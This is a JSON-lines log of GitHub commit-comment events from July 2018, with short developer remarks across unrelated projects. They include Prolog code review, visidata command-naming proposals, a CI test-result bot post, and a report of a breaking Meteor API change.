{"id":"7903886556","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29559933,"position":6,"line":6,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-01T23:46:53Z","updated_at":"2018-07-01T23:46:53Z","author_association":"COLLABORATOR","body":"La forma correcta de usar \"discontiguous\" sería la siguiente:\r\n:- discontiguous(pareja/2)."}},"created_at":"2018-07-01T23:46:53Z"}
{"id":"7903890011","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29559937,"position":25,"line":25,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-01T23:49:49Z","updated_at":"2018-07-01T23:49:49Z","author_association":"COLLABORATOR","body":"Faltan dos personajes, aunque no se usan en el programa\r\npersonaje(elVendedor, vender([humo, iphone])).\r\npersonaje(jimmie,     vender([auto])).\r\n"}},"created_at":"2018-07-01T23:49:49Z"}
{"id":"7903891712","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"braathwaate/FA24extensions"},"payload":{"comment":{"id":29559942,"position":null,"line":null,"path":null,"commit_id":"2bae815fa1de84b98b63e0e74db945ae6fcb30b2","created_at":"2018-07-01T23:51:18Z","updated_at":"2018-07-01T23:51:18Z","author_association":"NONE","body":"Pulled into upstream:\r\nhttps://github.com/apmuthu/FA24extensions/commit/e7f800c92556829834ff329eb4f0087f79d6ecf1\r\n"}},"created_at":"2018-07-01T23:51:18Z"}
{"id":"7903893284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29559943,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-01T23:52:40Z","updated_at":"2018-07-01T23:52:40Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1681 of 1681 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-01T23:52:40Z"}
{"id":"7903895746","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29559947,"position":113,"line":113,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-01T23:54:47Z","updated_at":"2018-07-01T23:54:47Z","author_association":"COLLABORATOR","body":"Recomendación:\r\nReemplazar \"nivelRespeto(Personaje,Nivel)\" por\r\n\"nivelRespeto(Personaje,10)\", así se puede omitir \"Nivel is 10\".\r\nEn mumuki saldría una advertencia del tipo \"el predicado usa is, pero no se hace ninguna operación\""}},"created_at":"2018-07-01T23:54:47Z"}
{"id":"7903899141","type":"CommitCommentEvent","actor":{"login":"mari967"},"repo":{"name":"piatti/pdep-lunes-cursada-G3"},"payload":{"comment":{"id":29559955,"position":90,"line":90,"path":"Logico/TpLogico.pl","commit_id":"6030748e60ecc64570228a0e3dc919a09860face","created_at":"2018-07-01T23:57:35Z","updated_at":"2018-07-01T23:57:35Z","author_association":"COLLABORATOR","body":"Yo cambiaría \"Empleado\" por \"Empleador\" para que sea más claro."}},"created_at":"2018-07-01T23:57:35Z"}
{"id":"7902360023","type":"CommitCommentEvent","actor":{"login":"amaecon"},"repo":{"name":"d-ivano/Group-10"},"payload":{"comment":{"id":29556293,"position":null,"line":null,"path":null,"commit_id":"050f797a392c4144218cf0a2f09a6b998cd3956e","created_at":"2018-07-01T03:07:04Z","updated_at":"2018-07-01T03:07:04Z","author_association":"NONE","body":"Hey Everyone,\r\n\r\nWasn't sure how to post a comment to this site. Here is the raw data for our Term Project on BIXI. Its a large dataset. https://www.kaggle.com/aubertsigouin/biximtl ... about 166 MB"}},"created_at":"2018-07-01T03:07:04Z"}
{"id":"7902361449","type":"CommitCommentEvent","actor":{"login":"ordercard"},"repo":{"name":"ordercard/RBTree"},"payload":{"comment":{"id":29556297,"position":1,"line":1,"path":"README.md","commit_id":"a3babf0ebf945458fa41a69f693cffb61c8d58d4","created_at":"2018-07-01T03:08:45Z","updated_at":"2018-07-01T03:08:45Z","author_association":"OWNER","body":"#打印日志的方式不能太直观理解红黄树算法， 参考了网上的代码和easejs文档，完成了一个前端网页的的动态展示红黑树算法的一个html文件，需要联网使用~因为依赖 easejs cdn "}},"created_at":"2018-07-01T03:08:45Z"}
{"id":"7902363279","type":"CommitCommentEvent","actor":{"login":"jakeonaut"},"repo":{"name":"jakeonaut/endless-fantasy-dungeon"},"payload":{"comment":{"id":29556300,"position":null,"line":null,"path":null,"commit_id":"315029e79cb8e689e2c75c568123ff0ae86ee2ba","created_at":"2018-07-01T03:10:56Z","updated_at":"2018-07-01T03:10:56Z","author_association":"OWNER","body":"also reorganized scenes into directories"}},"created_at":"2018-07-01T03:10:56Z"}
{"id":"7902363662","type":"CommitCommentEvent","actor":{"login":"hustr"},"repo":{"name":"hustr/OnlineJudge"},"payload":{"comment":{"id":29556301,"position":null,"line":null,"path":null,"commit_id":"f37e634d6680621b5bdd5952df7fbdb07740291a","created_at":"2018-07-01T03:11:24Z","updated_at":"2018-07-01T03:11:24Z","author_association":"OWNER","body":"863我差点拿图论做了，🤮"}},"created_at":"2018-07-01T03:11:24Z"}
{"id":"7902364430","type":"CommitCommentEvent","actor":{"login":"wli3"},"repo":{"name":"JayBazuzi/CliCommandLineParser"},"payload":{"comment":{"id":29556307,"position":null,"line":null,"path":null,"commit_id":"6207d35dd8a9ba207f86eac278fe750d34233db3","created_at":"2018-07-01T03:12:19Z","updated_at":"2018-07-01T03:12:19Z","author_association":"NONE","body":"best commit message"}},"created_at":"2018-07-01T03:12:19Z"}
{"id":"7902364564","type":"CommitCommentEvent","actor":{"login":"hawkw"},"repo":{"name":"sos-os/alarm"},"payload":{"comment":{"id":29556308,"position":26,"line":26,"path":"alarm_base/tests/alarm_test.rs","commit_id":"9a978aebdd64566f283e79454456969aca9e3ec3","created_at":"2018-07-01T03:12:27Z","updated_at":"2018-07-01T03:12:27Z","author_association":"MEMBER","body":"No, that's entirely my fault don't worry about that."}},"created_at":"2018-07-01T03:12:27Z"}
{"id":"7902365103","type":"CommitCommentEvent","actor":{"login":"oxlong27"},"repo":{"name":"surajmandalcell/elementary-x"},"payload":{"comment":{"id":29556309,"position":null,"line":null,"path":null,"commit_id":"ff2f61a55319a8c58d96ea75f5ae471c4931892c","created_at":"2018-07-01T03:13:02Z","updated_at":"2018-07-01T03:13:02Z","author_association":"NONE","body":"is there anyway you could tell me how to do this with the Numix-Circle icon pack.  I just want the stock elementary wing panel icons but the numix circle for everything else.  forgive me if this isnt the proper place I'm pretty new to this and semi-new to linux.  thank you so much"}},"created_at":"2018-07-01T03:13:02Z"}
{"id":"7902366108","type":"CommitCommentEvent","actor":{"login":"paulohenriquesn"},"repo":{"name":"raffalang/Interpretador777"},"payload":{"comment":{"id":29556310,"position":null,"line":null,"path":null,"commit_id":"4183e8a60fb9e677d04d83622965e3488e3a38d7","created_at":"2018-07-01T03:14:10Z","updated_at":"2018-07-01T03:14:10Z","author_association":"CONTRIBUTOR","body":"Exemplo:\r\n\r\nVARIAVEL meudinheiro = FERNVNDXCLOTHING = 0 BRO;\r\nEU TENHO MACONHA AGR SOMA AE &meudinheiro 10 BRO;\r\nTODO MUNDO FALA DE MIM &meudinheiro BRO;\r\nEU TENHO MACONHA AGR RETIRA AE &meudinheiro 10 BRO;\r\nTODO MUNDO FALA DE MIM &meudinheiro BRO;"}},"created_at":"2018-07-01T03:14:10Z"}
{"id":"7902369620","type":"CommitCommentEvent","actor":{"login":"henrybc08"},"repo":{"name":"marcelogaray/auto-GA-v01"},"payload":{"comment":{"id":29556315,"position":null,"line":null,"path":null,"commit_id":"0d10f854b3d6b9131b67accea28b5239c691d45c","created_at":"2018-07-01T03:18:23Z","updated_at":"2018-07-01T03:18:23Z","author_association":"COLLABORATOR","body":"![imagen](https://user-images.githubusercontent.com/38562156/42130746-cdc00d92-7cbb-11e8-80aa-fda70261ab6f.png)\r\n\r\nreview of conflict solved"}},"created_at":"2018-07-01T03:18:23Z"}
{"id":"7902371821","type":"CommitCommentEvent","actor":{"login":"PIGZHOUMINENG"},"repo":{"name":"PIGZHOUMINENG/flowboxc"},"payload":{"comment":{"id":29556317,"position":4,"line":44,"path":"flowboxc.plist","commit_id":"49e69034891bf67c08db468bf57f1ef7baae22dc","created_at":"2018-07-01T03:20:59Z","updated_at":"2018-07-01T03:20:59Z","author_association":"OWNER","body":"SSS"}},"created_at":"2018-07-01T03:20:59Z"}
{"id":"7902373142","type":"CommitCommentEvent","actor":{"login":"babsci"},"repo":{"name":"babsci/Recommend-System"},"payload":{"comment":{"id":29556322,"position":null,"line":null,"path":null,"commit_id":"2bb02da44685bec2e8ae41d3537eadecb5b55640","created_at":"2018-07-01T03:22:33Z","updated_at":"2018-07-01T03:22:33Z","author_association":"OWNER","body":"mapreduce sample1:sorting"}},"created_at":"2018-07-01T03:22:33Z"}
{"id":"7902381203","type":"CommitCommentEvent","actor":{"login":"coffeeboo"},"repo":{"name":"coffeeboo/carwash"},"payload":{"comment":{"id":29556331,"position":null,"line":null,"path":null,"commit_id":"a0efba4dc669cfa182e8b9528d3a45064a78cc52","created_at":"2018-07-01T03:31:46Z","updated_at":"2018-07-01T03:31:46Z","author_association":"OWNER","body":"*deno"}},"created_at":"2018-07-01T03:31:46Z"}
{"id":"7902384700","type":"CommitCommentEvent","actor":{"login":"bkoelman"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29556334,"position":5,"line":22,"path":"src/Compilers/Core/Portable/Operations/IEventAssignmentOperation.cs","commit_id":"ffb2259cdf65dbed83173b8d7fde36c9b3ae8617","created_at":"2018-07-01T03:35:48Z","updated_at":"2018-07-01T03:35:48Z","author_association":"CONTRIBUTOR","body":"`IEventReferenceOperation` is a binary break, so I have resorted to reflection to support both current and next versions. As long as I publish my new version before this ships, all should be fine. Any indication when that will be?\r\n\r\nThe change for `ICollectionElementInitializerOperation` is source-only, so not a problem for me. Because if I want to support new operations, I need to increase the required VS version and rebuild. Until then, I keep referencing the current version, which works properly with preview3 too (due to binding redirects in VS).\r\n\r\nI have scanned the history of PublicAPI.Unshipped.txt and found no other breaks. Side note: Making types and methods obsolete is missing in that file.\r\n\r\nIf there still are other breaks, I would very much like to know about them before any of this ships. And it would be nice for others to have them documented somewhere."}},"created_at":"2018-07-01T03:35:48Z"}
{"id":"7902388586","type":"CommitCommentEvent","actor":{"login":"Kan-Harada"},"repo":{"name":"YOODS/rovi"},"payload":{"comment":{"id":29556338,"position":null,"line":null,"path":null,"commit_id":"70d759e930a1c9cb3cbe407cecccdd5b48a63e0d","created_at":"2018-07-01T03:40:22Z","updated_at":"2018-07-01T03:40:22Z","author_association":"NONE","body":"最新をpullしてきたところ、YCAM3D-IIIで動かなかった(カメラ解像度が取得できないとか)ので、手元ではこの変更をコメントアウトしました。"}},"created_at":"2018-07-01T03:40:22Z"}
{"id":"7902389061","type":"CommitCommentEvent","actor":{"login":"wli3"},"repo":{"name":"JayBazuzi/CliCommandLineParser"},"payload":{"comment":{"id":29556339,"position":null,"line":null,"path":null,"commit_id":"cfbbd8d6c5ae552223993c4383a3672deae1975b","created_at":"2018-07-01T03:40:57Z","updated_at":"2018-07-01T03:40:57Z","author_association":"NONE","body":"This step it something I am missing. I can extract to TryXX!"}},"created_at":"2018-07-01T03:40:57Z"}
{"id":"7902390579","type":"CommitCommentEvent","actor":{"login":"QuinnBast"},"repo":{"name":"QuinnBast/CueB-Game-Engine"},"payload":{"comment":{"id":29556345,"position":null,"line":null,"path":null,"commit_id":"d7ed9f7e09f41cb593a742bc5f8306e9886cb5ac","created_at":"2018-07-01T03:42:50Z","updated_at":"2018-07-01T03:42:50Z","author_association":"OWNER","body":"Progress on #12 and #14"}},"created_at":"2018-07-01T03:42:50Z"}
{"id":"7902390759","type":"CommitCommentEvent","actor":{"login":"Virtueplace"},"repo":{"name":"Virtueplace/QuizApp"},"payload":{"comment":{"id":29556346,"position":null,"line":null,"path":null,"commit_id":"cced214701f09526c25b58971a1f2dc3d7e62b0a","created_at":"2018-07-01T03:43:01Z","updated_at":"2018-07-01T03:43:01Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1C9xS-91aFlcrMPFnqdGlBUMEqCl1XNcC"}},"created_at":"2018-07-01T03:43:01Z"}
{"id":"7902393305","type":"CommitCommentEvent","actor":{"login":"wli3"},"repo":{"name":"JayBazuzi/CliCommandLineParser"},"payload":{"comment":{"id":29556352,"position":null,"line":null,"path":null,"commit_id":"165782adba9ef961ff55a9d901362535e6eeffe7","created_at":"2018-07-01T03:46:02Z","updated_at":"2018-07-01T03:46:02Z","author_association":"NONE","body":"function to `lambda count` as extract variable? This is a recipe refactoring(vs R#) right?"}},"created_at":"2018-07-01T03:46:02Z"}
{"id":"7902397613","type":"CommitCommentEvent","actor":{"login":"a376801024"},"repo":{"name":"foehnsturm/Mark2"},"payload":{"comment":{"id":29556357,"position":null,"line":null,"path":null,"commit_id":"16a76f7667ba869d1b6cf448b3d098538ee52c49","created_at":"2018-07-01T03:51:08Z","updated_at":"2018-07-01T03:51:08Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-01T03:51:08Z"}
{"id":"7902398478","type":"CommitCommentEvent","actor":{"login":"huanghongxun"},"repo":{"name":"huanghongxun/HMCL"},"payload":{"comment":{"id":29556358,"position":13,"line":190,"path":"HMCLCore/src/main/java/org/jackhuang/hmcl/task/Task.java","commit_id":"2bd4bc1472114439b205f611761875e0669b93bf","created_at":"2018-07-01T03:52:08Z","updated_at":"2018-07-01T03:52:08Z","author_association":"OWNER","body":"since IDEA completes the sentence by default"}},"created_at":"2018-07-01T03:52:08Z"}
{"id":"7902399422","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556359,"position":5,"line":14,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:53:11Z","updated_at":"2018-07-01T03:53:11Z","author_association":"COLLABORATOR","body":"I chose `advance-replay` instead of `next-replay` because it fit the video cassette playing theme."}},"created_at":"2018-07-01T03:53:11Z"}
{"id":"7902400582","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556360,"position":11,"line":19,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:54:35Z","updated_at":"2018-07-01T03:54:35Z","author_association":"COLLABORATOR","body":"I made a choice for `sysopen` over `open-external`. I think it fits with our current definition of `syscopy` but I am not emotionally connected to this decision either way.\r\n\r\nPro: Makes our longnames shorter."}},"created_at":"2018-07-01T03:54:35Z"}
{"id":"7902400636","type":"CommitCommentEvent","actor":{"login":"xiongl1993"},"repo":{"name":"dyc87112/SpringBoot-Learning"},"payload":{"comment":{"id":29556361,"position":25,"line":25,"path":"Chapter2-2-1/src/main/java/com/didispace/Application.java","commit_id":"6ac5953861012757a2099d6a46c7d758adf52691","created_at":"2018-07-01T03:54:38Z","updated_at":"2018-07-01T03:54:38Z","author_association":"NONE","body":"binder这个对象是什么？"}},"created_at":"2018-07-01T03:54:38Z"}
{"id":"7902402155","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29556363,"position":null,"line":null,"path":null,"commit_id":"16e1d9364bcdd6b5bd54c46b1196f6282b145abf","created_at":"2018-07-01T03:56:17Z","updated_at":"2018-07-01T03:56:17Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-01T03:56:17Z"}
{"id":"7902402892","type":"CommitCommentEvent","actor":{"login":"thawtes"},"repo":{"name":"openatv/enigma2"},"payload":{"comment":{"id":29556367,"position":null,"line":null,"path":null,"commit_id":"5b9a9c3124bc71935b35fe38ff5b18852f51a86a","created_at":"2018-07-01T03:57:13Z","updated_at":"2018-07-01T03:57:13Z","author_association":"CONTRIBUTOR","body":"thank you @arn354 \r\nproblems fixed !\r\neverything works fine"}},"created_at":"2018-07-01T03:57:13Z"}
{"id":"7902403584","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556368,"position":15,"line":22,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:58:03Z","updated_at":"2018-07-01T03:58:03Z","author_association":"COLLABORATOR","body":"If we do `reload-sheet` to `reload`, then we also change `save-sheet` to `save`. They are both sufficiently short that I am unsure if there is much benefit to cutting them down further."}},"created_at":"2018-07-01T03:58:03Z"}
{"id":"7902403884","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556369,"position":24,"line":29,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:58:25Z","updated_at":"2018-07-01T03:58:25Z","author_association":"COLLABORATOR","body":"I left `threads-all` because we had decided on `errors-all` and it falls into a similar camp."}},"created_at":"2018-07-01T03:58:25Z"}
{"id":"7902404098","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556370,"position":25,"line":30,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:58:40Z","updated_at":"2018-07-01T03:58:40Z","author_association":"COLLABORATOR","body":"I left `pause-replay` because it fit the video cassette theme."}},"created_at":"2018-07-01T03:58:40Z"}
{"id":"7902404983","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556372,"position":36,"line":42,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:59:42Z","updated_at":"2018-07-01T03:59:42Z","author_association":"COLLABORATOR","body":"I thought `key-col` was a really cute idea which fits our framework better, removes the issue of your dissatisfaction with the multiple meanings behind `toggle`, and makes the longname much shorter."}},"created_at":"2018-07-01T03:59:42Z"}
{"id":"7902405156","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556373,"position":37,"line":43,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T03:59:56Z","updated_at":"2018-07-01T03:59:56Z","author_association":"COLLABORATOR","body":"`key-col-on` is much clearer than `set-keycol`."}},"created_at":"2018-07-01T03:59:56Z"}
{"id":"7902405706","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556381,"position":49,"line":59,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:00:22Z","updated_at":"2018-07-01T04:00:22Z","author_association":"COLLABORATOR","body":"I switched `close-col` to `contract-col` because `contract` feels like a better inverse to `expand`."}},"created_at":"2018-07-01T04:00:22Z"}
{"id":"7902406957","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556383,"position":50,"line":60,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:01:39Z","updated_at":"2018-07-01T04:01:39Z","author_association":"COLLABORATOR","body":"I switched `subst-col` to `addcol-subst` because we had decided on making that switch for `=`. It is more clear than `derive-` of what is happening and it fits better with `setcol-subst`.\r\n\r\nI do not think `split-col` and `capture-col` need to be changed because they do not have `setcol` variants."}},"created_at":"2018-07-01T04:01:39Z"}
{"id":"7902407562","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556384,"position":54,"line":63,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:02:17Z","updated_at":"2018-07-01T04:02:17Z","author_association":"COLLABORATOR","body":"We used `numerics` to mean `numeric columns` for plot and so I used that for `aggregate-numerics`."}},"created_at":"2018-07-01T04:02:17Z"}
{"id":"7902408181","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556386,"position":63,"line":115,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:02:57Z","updated_at":"2018-07-01T04:02:57Z","author_association":"COLLABORATOR","body":"I think `sheets-graveyard` is much more poetic from `sheets-trash`. For one thing, the dead can be resurrected while recycling your trash is just plain silly. "}},"created_at":"2018-07-01T04:02:57Z"}
{"id":"7902409090","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556388,"position":75,"line":142,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:03:58Z","updated_at":"2018-07-01T04:03:58Z","author_association":"COLLABORATOR","body":"I prefer `cut-blah` over `delete-blah` because `cut-` is more indicative over what is actually happening.\r\n\r\nThis reminds me of the hours I spent trying to catch a bellsprout in bellsprout tower so that I had something I could teach how to cut."}},"created_at":"2018-07-01T04:03:58Z"}
{"id":"7902409891","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556392,"position":77,"line":144,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:04:53Z","updated_at":"2018-07-01T04:04:53Z","author_association":"COLLABORATOR","body":"I swapped out `delete-cell` with `setcell-none` which follows the lovely `setcell` format while being more accurate."}},"created_at":"2018-07-01T04:04:53Z"}
{"id":"7902410343","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556393,"position":78,"line":145,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:05:24Z","updated_at":"2018-07-01T04:05:24Z","author_association":"COLLABORATOR","body":"I was unsure whether to add the `-selected-` to `gzd`. I did add it in, but now I am wondering how you feel about `selected` -> `sel`."}},"created_at":"2018-07-01T04:05:24Z"}
{"id":"7902410889","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556394,"position":87,"line":163,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:06:03Z","updated_at":"2018-07-01T04:06:03Z","author_association":"COLLABORATOR","body":"I kept `paste-after` and did not modify it to `paste-row-after`. I felt the default behaviour was implied."}},"created_at":"2018-07-01T04:06:03Z"}
{"id":"7902411449","type":"CommitCommentEvent","actor":{"login":"Rufel"},"repo":{"name":"Riey/eraTHYMKR"},"payload":{"comment":{"id":29556395,"position":null,"line":null,"path":null,"commit_id":"90ed235c66a7e87e710919b4d9bb84238bffb0ec","created_at":"2018-07-01T04:06:43Z","updated_at":"2018-07-01T04:06:43Z","author_association":"CONTRIBUTOR","body":"Binary file not shown이라고 뜨는데...\r\n원래 이런건가요?"}},"created_at":"2018-07-01T04:06:43Z"}
{"id":"7902411499","type":"CommitCommentEvent","actor":{"login":"anjakefala"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29556396,"position":99,"line":173,"path":"commands-proposal.tsv","commit_id":"76641f525f69a5eb7b25cf7475a6de4a6a533e8e","created_at":"2018-07-01T04:06:46Z","updated_at":"2018-07-01T04:06:46Z","author_association":"COLLABORATOR","body":"I changed `toggle-` to `stoggle-` because we did not manage to remove all existences of other `toggle`s. If it is at all possible, maybe we should consider that as the lesser of the evils."}},"created_at":"2018-07-01T04:06:46Z"}
{"id":"7902412889","type":"CommitCommentEvent","actor":{"login":"Rufel"},"repo":{"name":"Riey/eraTHYMKR"},"payload":{"comment":{"id":29556398,"position":null,"line":null,"path":null,"commit_id":"90ed235c66a7e87e710919b4d9bb84238bffb0ec","created_at":"2018-07-01T04:08:21Z","updated_at":"2018-07-01T04:08:21Z","author_association":"CONTRIBUTOR","body":"View 누르면 글자는 안 깨지네요"}},"created_at":"2018-07-01T04:08:21Z"}
{"id":"7902412970","type":"CommitCommentEvent","actor":{"login":"JamesMcCarthy79"},"repo":{"name":"CCOSTAN/Home-AssistantConfig"},"payload":{"comment":{"id":29556399,"position":null,"line":null,"path":null,"commit_id":"975c92b80d4b4f29c8e11395617ed07ff67907dd","created_at":"2018-07-01T04:08:26Z","updated_at":"2018-07-01T04:08:26Z","author_association":"NONE","body":"Looks great, always starts to get a bit hard to fit it all in as it grows"}},"created_at":"2018-07-01T04:08:26Z"}
{"id":"7902415635","type":"CommitCommentEvent","actor":{"login":"tienne-B"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29556400,"position":4,"line":9,"path":"tabbycat/privateurls/templates/private_urls_nav.html","commit_id":"1b0bcbf34c6fa84cbd525f9e5afe19b568a4c0db","created_at":"2018-07-01T04:11:31Z","updated_at":"2018-07-01T04:11:31Z","author_association":"CONTRIBUTOR","body":"Don't forget to translate that (and other places)! :)"}},"created_at":"2018-07-01T04:11:31Z"}
{"id":"7902416401","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":29556401,"position":5,"line":1798,"path":"data/base-recipes.yaml","commit_id":"9feb365960f67ac89d1aa47760265e92dfe4bd2e","created_at":"2018-07-01T04:12:20Z","updated_at":"2018-07-01T04:12:20Z","author_association":"OWNER","body":"@Sarvatt this had some pretty bad behavior for one of my characters. Before this change, he'd only been doing knitting workorders; after, he started doing sewing too. But I hadn't bought him all the sewing tools.\r\n\r\nFor that F2P character, the inventory restriction makes this undesirable (but probably something I can still make work)."}},"created_at":"2018-07-01T04:12:20Z"}
{"id":"7902420768","type":"CommitCommentEvent","actor":{"login":"kentonv"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":29556409,"position":7,"line":7,"path":"packages/tracker/deprecated.js","commit_id":"14f6f9328bf358b3d953968d29246573d2d05366","created_at":"2018-07-01T04:16:55Z","updated_at":"2018-07-01T04:16:55Z","author_association":"CONTRIBUTOR","body":"Hello. It's me again. You know what that means...\r\n\r\nYep. This removal broke Sandstorm, which had one call to `Meteor.autorun` in the codebase. Fixed at: https://github.com/sandstorm-io/sandstorm/commit/3ea917694886f3ec62de37b2d84dfc1b0bc51907\r\n\r\nUnfortunately, the breakage was subtle and was not caught by any automated tests. An exception was thrown during client-side `Meteor.startup()` processing, causing subsequent startup code not to run -- however, this doesn't prevent the page from loading and mostly functioning. We only noticed when a Taiwanese user complained that language detection for i18n no longer appeared to work.\r\n\r\nOf course, we should have better tests. However, it seems unfortunate if 100% test coverage is a prerequisite to being able to update our dependencies.\r\n\r\nIt would be helpful if Meteor's migration guides would document any known breaking changes to the API. [The migration guide for 1.7](https://guide.meteor.com/1.7-migration.html) did not mention this change. If it had, I would have noticed and could then have grepped my code for calls to the removed functions.\r\n\r\nAnother thing to consider -- though I realize it's probably an unrealistically large undertaking at this point -- would be to publish TypeScript type definitions for the Meteor API. Undocumented breaking API changes are fine if they can be caught at build time."}},"created_at":"2018-07-01T04:16:55Z"}
{"id":"7902431988","type":"CommitCommentEvent","actor":{"login":"klondikemarlen"},"repo":{"name":"elthran/BookingSystem"},"payload":{"comment":{"id":29556424,"position":9,"line":19,"path":"booking/routes/business/delete_employee_availability.py","commit_id":"465950a373960c1a019c99c7ef4cc3e78793f00e","created_at":"2018-07-01T04:30:04Z","updated_at":"2018-07-01T04:30:04Z","author_association":"COLLABORATOR","body":"Bulk delete is possible though complicated :P so I  think your way is fine.\r\n```python\r\ndb.session.expire_all()\r\nAvailability.query.filter_by(user_id=current_user.id).delete(synchronize_session=False)\r\n```\r\n\r\nSee: http://docs.sqlalchemy.org/en/latest/orm/query.html#sqlalchemy.orm.query.Query.delete"}},"created_at":"2018-07-01T04:30:04Z"}
